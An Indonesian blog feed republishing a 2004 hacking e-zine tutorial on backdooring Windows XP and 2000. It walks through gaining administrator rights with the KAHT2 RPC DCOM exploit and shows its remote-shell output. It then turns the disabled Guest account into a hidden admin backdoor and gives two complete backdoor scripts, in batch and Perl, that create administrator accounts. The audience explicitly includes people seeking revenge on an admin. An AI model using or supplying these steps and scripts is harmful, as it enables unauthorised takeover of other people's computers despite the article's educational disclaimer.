<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-31170893</id><updated>2011-12-14T18:40:39.282-08:00</updated><title type='text'>Pemrograman</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ujank-programer.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/31170893/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ujank-programer.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Uj@nK</name><uri>http://www.blogger.com/profile/07125615494412928088</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://i45.photobucket.com/albums/f59/tauq_boz/1.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-31170893.post-115366637726043790</id><published>2006-07-23T07:15:00.000-07:00</published><updated>2006-12-25T10:49:31.620-08:00</updated><title type='text'>Tea Break</title><content type='html'>&lt;pre&gt;&lt;span style="font-size:130%;"&gt;\_   _____/\_   ___ \ /   |   \\_____   |    __)_ /    \  \//    ~    \/   |     |        \\     \___        \/         \/       \/         \/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;       .OR.ID&lt;br /&gt;ECHO-ZINE RELEASE&lt;br /&gt;    05&lt;br /&gt;&lt;br /&gt;Author: y3dips || y3dips@echo.or.id || y3d1ps@telkom.net&lt;br /&gt;Online @ www.echo.or.id :: http://ezine.echo.or.id&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;== Backd00ring WINDOS XP &amp;&amp;amp; 2000 ==&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pengantar&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt; &lt;div style="text-align: justify;"&gt;&lt;span style="font-size:130%;"&gt; Tulisan ini dibuat untuk membuktikan bahwa sabotase account admin&lt;br /&gt; pada windows juga dapat dilakukan secara lokal, bisa dengan&lt;br /&gt;menggunakan software yang sama, atau bahkan tanpa software sama sekali&lt;br /&gt;tulisan ini juga menyambung artikel yang di buat oleh the_day,&lt;br /&gt;tetapi di khususkan untuk eksploitasi secara lokal .&lt;br /&gt;&lt;/span&gt;&lt;/div&gt; &lt;pre&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;br /&gt;artikel ini ditujukan untuk :&lt;br /&gt;- buat yang lupa password admin :p&lt;br /&gt;- buat yang mimpi pengen jadi admin :P&lt;br /&gt;- buat yang dendam sama admin karena di curangin :)&lt;br /&gt;- buat yang mau belajar exploitasi windows&lt;br /&gt;- buat yang mau tau kebobrokan windows&lt;br /&gt;- ..... (isi ndiri, kenapa kamu tertarik baca ini)&lt;br /&gt;&lt;br /&gt;bahan yang di perlukan :&lt;br /&gt;-sploits RPC DCOM : *kaht2 (for windust)&lt;br /&gt;-account user biasa or minimal Guest&lt;br /&gt;&lt;br /&gt;dari user biasa :&lt;br /&gt;&lt;br /&gt;1. ekstrak kaht2 yang dimiliki, biar mudah taruh aja di C:  terus jalankan :&lt;br /&gt;start &gt; run &gt; command &gt;&lt;br /&gt;&lt;br /&gt;masuk ke c:\ipconfig or kalo males pake ip jaringan bisa pake&lt;br /&gt;ip buat loopback yaitu 127.0.0.1&lt;br /&gt;&lt;br /&gt;ketik aja:&lt;br /&gt;c:\kaht2 127.0.0.01 127.0.0.1&lt;br /&gt;&lt;br /&gt;_________________________________________________&lt;br /&gt;        KAHT II - MASSIVE RPC EXPLOIT&lt;br /&gt;DCOM RPC exploit. Modified by aT4r@3wdesign.es&lt;br /&gt;#haxorcitos &amp;&amp;amp; #localhost  @Efnet Ownz you!!!&lt;br /&gt;           PUBLIC VERSION :P&lt;br /&gt;________________________________________________&lt;br /&gt;&lt;br /&gt;[+] Targets: 127.0.0.0-127.0.0.1 with 50 Threads&lt;br /&gt;[+] Attacking Port: 135. Remote Shell at port: 328&lt;br /&gt;[+] Scan In Progress...&lt;br /&gt;- Connecting to 127.0.0.1&lt;br /&gt; Sending Exploit to a [WinXP] Server...&lt;br /&gt;- Conectando con la Shell Remota...&lt;br /&gt;&lt;br /&gt;Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;&lt;br /&gt;C:\WINDOWS\system32&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;masuk deh :D dengan account Administrator&lt;br /&gt;&lt;br /&gt;sekarang kamu mau ngapain? bikin backdoor aja or mau buat account baru&lt;br /&gt;admin or jadiin account kamu admin ?&lt;br /&gt;&lt;br /&gt;a. bikin backdoor aja :D&lt;br /&gt;kalo ini kamu kudu cari account yang gak di aktifkan sehingga user&lt;br /&gt;tersebut gak terdeteksi pada halaman login user :P&lt;br /&gt;biasanya account Guest yang dibuat tidak aktif padahal masih ada/default&lt;br /&gt;nah kamu bisa jadikan ini backdoor kamu , semisal kamu mau remote or&lt;br /&gt;login biasa :)&lt;br /&gt;&lt;br /&gt;gimana caranya ? belajar :P , just kiddding!&lt;br /&gt;&lt;br /&gt;kamu ketik sintax berikut ini , bair jelasnya kamu liat dulu account guest&lt;br /&gt;ada apa kagak ? pake sintax net user&lt;br /&gt;&lt;br /&gt;C:\WINDOWS\system32&gt;net user&lt;br /&gt;&lt;br /&gt;net user&lt;br /&gt;&lt;br /&gt;User accounts for ------------------------------------------------------------------------------&lt;br /&gt;Administrator            Guest                    HelpAssistant&lt;br /&gt;SUPPORT_388945a0         y3dips&lt;br /&gt;The command completed with one or more errors.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;(cat : lihat ada beberapa account yang tercipta di situ dan dapat di&lt;br /&gt; manfaatkan  :P)&lt;br /&gt;&lt;br /&gt;YUPe, ternyata ada account guest, biar jelas apa dia aktif or kagak&lt;br /&gt;kita ketik aje     net user Guest&lt;br /&gt;&lt;br /&gt;C:\WINDOWS\system32&gt;net user Guest&lt;br /&gt;net user Guest&lt;br /&gt;User name                    Guest&lt;br /&gt;Full Name&lt;br /&gt;Comment                      Built-in account for guest access to the computer/d&lt;br /&gt;omain&lt;br /&gt;User's comment&lt;br /&gt;Country code                 000 (System Default)&lt;br /&gt;Account active               No                    &lt;br /&gt;&lt;=====gak aktif :p Account expires              Never  Password last set           2/29/2004 3:58 AM Password expires             Never Password changeable          2/29/2004 3:58 AM Password required            No User may change password     No  Workstations allowed         All Logon script User profile Home directory Last logon                   2/29/2004 3:42 AM  Logon hours allowed          All  Local Group Memberships      *Guests Global Group memberships     *None The command completed successfully.   hehehehe, ternyata gak aktif euy..   sekarang kita jadikan backdoor pake perintah  C:\WINDOWS\system32&gt;net localgroup Administrators Guest /add&lt;br /&gt;&lt;br /&gt;menjadikan user Guest menjadi group Administrators.&lt;br /&gt;&lt;br /&gt;oke! kelar sudah jika kita perlu sekali-sekali maka tinggal memakai&lt;br /&gt;account ini, awas jangan sampai di ambil orang lo...&lt;br /&gt;or mau dikasih password aja, biar lebih asyik :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;b. buat account sebagai admin&lt;br /&gt;&lt;br /&gt;setelah dapet command prompt sebagai admin hasil dari eksploitasi dengan&lt;br /&gt;kaht2 atau echokillrpc, maka tinggal jalankan exploits echobacd00r.bat&lt;br /&gt;atau echobackd00r.exe yang dapat anda letakkan pada disket atau telah&lt;br /&gt;copikan ke C:\Windows\system32&lt;br /&gt;sehingga tinggal ketik&lt;br /&gt;&lt;br /&gt;c:\windows\system32\echobacd00r.bat&lt;br /&gt;&lt;br /&gt; selesai!!!&lt;br /&gt;&lt;br /&gt; atau jika anda tidak menggunakan echobackd00r.bat atau echobackd00r.exe&lt;br /&gt; anda dapat mengetikkan secara manual dengan penggunaan net user dan&lt;br /&gt; net localgroup, untuk detilnya sama seperti pembuatan account admin&lt;br /&gt; pada artikel the_day tentang hacking windows 2000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2 . Ekploitasi karena kelemahan windust apabila saat installasi gak&lt;br /&gt; ngisiin password admin (inget gak!!)&lt;br /&gt;&lt;br /&gt; cara termudah adalah kamu masuk ke windows, saat booting tekan&lt;br /&gt; F8, terus pilih safe mode dengan command prompt&lt;br /&gt; setelah itu mausk deh ke account admin, :P&lt;br /&gt;&lt;br /&gt; pake command prompt dan perintah net user untuk add user dan&lt;br /&gt; pake sintax net localgroup untuk jadikan user tsb admin ..&lt;br /&gt;&lt;br /&gt;cat: terbukti pada beberapa pc yang di install di komputer&lt;br /&gt;    tempat bekerja yang ternyata dibiartkan dengan admin yang&lt;br /&gt;    tak berpassword :D,&lt;br /&gt;    (keasyikan buat click-click duang kali )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3.  Eksploitasi lokal dengan menggunakan :&lt;br /&gt; 1. Disk bootable,+ echobackd00r.bat/echobackd00r.exe (jika ada)&lt;br /&gt; 2. Eksploits kaht2&lt;br /&gt;&lt;br /&gt; masukkan disket,&lt;br /&gt; apabila  masuk ke command prompt maka silakan eksekusi langsung kaht2nya&lt;br /&gt;  &lt;br /&gt; selanjutnya tinggal modifikasi account yang ada atau ciptakan account baru&lt;br /&gt; (dapat menggunakan echobackd00r.bat atau secara manual)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; cara ini dilakukan jika cara 1 dan 2 tidak bisa di lakukan&lt;br /&gt; (cat : cara 1: account user biasa gak ada, cara 2: account admin&lt;br /&gt;   dengan F8 diberi password)&lt;br /&gt;&lt;br /&gt;[perintah net user ]&lt;br /&gt;&lt;br /&gt;NET USER&lt;br /&gt;[username [password | *] [options]] [/DOMAIN]&lt;br /&gt;      username {password | *} /ADD [options] [/DOMAIN]&lt;br /&gt;      username [/DELETE] [/DOMAIN]&lt;br /&gt;&lt;br /&gt;NET USER creates and modifies user accounts on computers. When used&lt;br /&gt;without switches, it lists the user accounts for the computer. The&lt;br /&gt;user account information is stored in the user accounts database.&lt;br /&gt;&lt;br /&gt;This command works only on servers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;username     Is the name of the user account to add, delete, modify, or&lt;br /&gt;          view. The name of the user account can have as many as&lt;br /&gt;          20 characters.&lt;br /&gt;password     Assigns or changes a password for the user's account.&lt;br /&gt;          A password must satisfy the minimum length set with the&lt;br /&gt;          /MINPWLEN option of the NET ACCOUNTS command. It can have as&lt;br /&gt;          many as 14 characters.&lt;br /&gt;*            Produces a prompt for the password. The password is not&lt;br /&gt;          displayed when you type it at a password prompt.&lt;br /&gt;/DOMAIN      Performs the operation on a domain controller of&lt;br /&gt;          the current domain.&lt;br /&gt;/ADD         Adds a user account to the user accounts database.&lt;br /&gt;/DELETE      Removes a user account from the user accounts database.&lt;br /&gt;&lt;br /&gt;Options      Are as follows:&lt;br /&gt;&lt;br /&gt;Options                    Description&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;/ACTIVE:{YES | NO}         Activates or deactivates the account. If&lt;br /&gt;                           the account is not active, the user cannot&lt;br /&gt;                           access the server. The default is YES.&lt;br /&gt;/COMMENT:"text"            Provides a descriptive comment about the&lt;br /&gt;                           user's account (maximum of 48 characters).&lt;br /&gt;                           Enclose the text in quotation marks.&lt;br /&gt;/COUNTRYCODE:nnn           Uses the operating system country code to&lt;br /&gt;                           implement the specified language files for a&lt;br /&gt;                           user's help and error messages. A value of&lt;br /&gt;                           0 signifies the default country code.&lt;br /&gt;/EXPIRES:{date | NEVER}    Causes the account to expire if date is&lt;br /&gt;                           set. NEVER sets no time limit on the&lt;br /&gt;                           account. An expiration date is in the&lt;br /&gt;                           form mm/dd/yy or dd/mm/yy, depending on the&lt;br /&gt;                           country code. Months can be a number,&lt;br /&gt;                           spelled out, or abbreviated with three&lt;br /&gt;                           letters. Year can be two or four numbers.&lt;br /&gt;                           Use slashes(/) (no spaces) to separate&lt;br /&gt;                           parts of the date.&lt;br /&gt;/FULLNAME:"name"           Is a user's full name (rather than a&lt;br /&gt;                           username). Enclose the name in quotation&lt;br /&gt;                           marks.&lt;br /&gt;/HOMEDIR:pathname          Sets the path for the user's home directory.&lt;br /&gt;                           The path must exist.&lt;br /&gt;/PASSWORDCHG:{YES | NO}    Specifies whether users can change their&lt;br /&gt;                           own password. The default is YES.&lt;br /&gt;/PASSWORDREQ:{YES | NO}    Specifies whether a user account must have&lt;br /&gt;                           a password. The default is YES.&lt;br /&gt;/PROFILEPATH[:path]        Sets a path for the user's logon profile.&lt;br /&gt;/SCRIPTPATH:pathname       Is the location of the user's logon&lt;br /&gt;                           script.&lt;br /&gt;/TIMES:{times | ALL}       Is the logon hours. TIMES is expressed as&lt;br /&gt;                           day[-day][,day[-day]],time[-time][,time&lt;br /&gt;                           [-time]], limited to 1-hour increments.&lt;br /&gt;                           Days can be spelled out or abbreviated.&lt;br /&gt;                           Hours can be 12- or 24-hour notation. For&lt;br /&gt;                           12-hour notation, use am, pm, a.m., or&lt;br /&gt;                           p.m. ALL means a user can always log on,&lt;br /&gt;                           and a blank value means a user can never&lt;br /&gt;                           log on. Separate day and time entries with&lt;br /&gt;                           a comma, and separate multiple day and time&lt;br /&gt;                           entries with a semicolon.&lt;br /&gt;/USERCOMMENT:"text"        Lets an administrator add or change the User&lt;br /&gt;                           Comment for the account.&lt;br /&gt;/WORKSTATIONS:{computername[,...] | *}&lt;br /&gt;                           Lists as many as eight computers from&lt;br /&gt;                           which a user can log on to the network. If&lt;br /&gt;                           /WORKSTATIONS has no list or if the list is *,&lt;br /&gt;                           the user can log on from any computer.&lt;br /&gt;&lt;br /&gt;NET HELP command | MORE displays Help one screen at a time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;: :berikut di cantumkan 2 buah script backd00r&lt;br /&gt;&lt;br /&gt;[echobackd00r.bat]&lt;br /&gt;&lt;br /&gt;cut here &amp;&lt;-----------------------------------------------------------     rem *echobackd00r.bat  rem *Maret 2004 - backd00r untuk XP &amp;amp;&amp; 2000  rem *dibuat untuk mempermudah menciptakan account admin  rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2  rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal  rem *cara pakai, ubah dulu USER="backdoor"  rem *cara pakai, ubah dulu PASS="password"    rem *MULAI.   @echo off  PROMPT $P$G  cls  Color 87  GOto iklan   :setting   rem *ganti USER dan PASS    set USER="backdoor"   set PASS="password"    if %USER%=="backdoor" Goto gagal else GOto proses   :proses    rem *masuk ke perintah tuk nambahin user + passwordnya    net user %USER% %PASS% /add   net localgroup Administrators %USER% /add  net localgroup Users %USER% /delete    cls   echo.   echo   Account %USER% dengan password %PASS% telah berhasil di buat!   color 70     EXIT   :iklan    rem * just a banner from me :) , bisa di hilangkan :p    echo.   echo  #####################################################   echo  #                                                  #   echo  #                   Echobackd00r                    #   echo  #     dibuat dan di coba oleh y3dips with XP OS     #   echo  # greetz to :the_day for idea, moby, z3r0byt3,comex #   echo  #              note: ubah USER dan PASS             #   echo  #                                                   #   echo  #####################################################   echo.  echo     tekan ENTER !!!   pause&gt;nul&lt;br /&gt;&lt;br /&gt;Goto setting :gagal&lt;br /&gt;&lt;br /&gt;echo.&lt;br /&gt;echo       edit file echobackd00r.bat dan ubah USER dan PASSnya&lt;br /&gt;echo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;rem *SELESAI.&lt;br /&gt;rem *created by y3dips : maret 2004 : http://echo.or.id&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;cut here &amp;amp;&lt;-----------------------------------------------------------        [echobackd00r.pl &gt; ubah ke exe dengan perl2exe]&lt;br /&gt;&lt;br /&gt;cut here &amp;&lt;-----------------------------------------------------------    # echobackd00r.pl digunakan untuk membuat account admin pada Windows XP, 2000  # kombinasikan dengan sploits RPC DCOM seperti KAHT2 dsb  # ubah ke exe dengan perl2exe   #!/usr/bin/perl     printf"\n  *********\n";      print "  *  *\n";      print "  *                      Echobackd00r *\n";      print "  *   created &amp;&amp;amp; tested by y3dips on XP Operating Sys      *\n";      print "  * greetz : the_day (untuk idenya), moby, comex, z3r0byt3 *\n";      print "  *          echo-memberz, newbie_hacker, puji_tiwili*     *\n";      print "  *                                                        *\n";      printf"  **********************************************************\n\n";   if(@ARGV == 2)  {        $uname    = $ARGV[0];       $password = $ARGV[1];    {   system(" net user $uname $password /add ");   system(" net localgroup Administrators $uname /add ");   system(" net localgroup Users $uname /delete ");   }  }   else  {      print "   [Gunakan] echobackd00r.exe username password  \n";  }    # end.  # created by y3dips : download from http://echo.or.id    cut here &amp;&lt;-----------------------------------------------------------      EOF.   Penutup.  tulisan ini tetap seperti tulisan-tulisan terdahulu yang ditujukan untuk pendidikan dan bertujuan untuk membukakan mata kita semua terhadap  pentingnya security, segala bentuk penyalahgunaan adalah bukan merupakan  tanggung jawab penulis .     *greetz to:  [echostaff a.k.a moby, the_day, comex ,z3r0byt3], echo memberz,        anak anak newbie_hacker,$peci@l temen2 seperjuangan    kirimkan kritik &amp;amp;amp;amp;&amp;amp; saran ke y3dips[at]echo.or.id   */ 0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/31170893-115366637726043790?l=ujank-programer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ujank-programer.blogspot.com/feeds/115366637726043790/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=31170893&amp;postID=115366637726043790' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/31170893/posts/default/115366637726043790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/31170893/posts/default/115366637726043790'/><link rel='alternate' type='text/html' href='http://ujank-programer.blogspot.com/2006/07/tea-break.html' title='Tea Break'/><author><name>Uj@nK</name><uri>http://www.blogger.com/profile/07125615494412928088</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://i45.photobucket.com/albums/f59/tauq_boz/1.gif'/></author><thr:total>1</thr:total></entry></feed>
